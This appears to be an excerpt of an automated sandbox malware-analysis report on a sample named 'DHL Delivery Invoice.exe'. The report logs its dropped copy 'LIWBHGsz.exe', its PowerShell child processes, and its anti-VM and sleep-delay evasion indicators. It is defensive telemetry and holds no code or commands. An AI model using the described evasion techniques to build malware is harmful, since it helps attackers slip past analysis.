                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: DHL Delivery Invoice.exe PID: 6724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LIWBHGsz.exe PID: 2852, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: 5090000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: 6090000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: 61C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: 71C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: B3B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: C3B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: C840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: D840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: DA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeMemory allocated: DA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: 2E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: 3100000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: 2E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: 5640000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: 6640000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: 6770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: 7770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: B580000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: C580000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: CA10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: 3050000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: 3110000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeMemory allocated: 5110000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3938Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5962Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 613Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWindow / User API: threadDelayed 3434Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeWindow / User API: threadDelayed 6426Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWindow / User API: threadDelayed 2037
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeWindow / User API: threadDelayed 7784
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 6752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 348Thread sleep count: 3938 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 708Thread sleep count: 170 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4460Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5052Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe TID: 7340Thread sleep time: -27670116110564310s >= -30000sJump to behavior
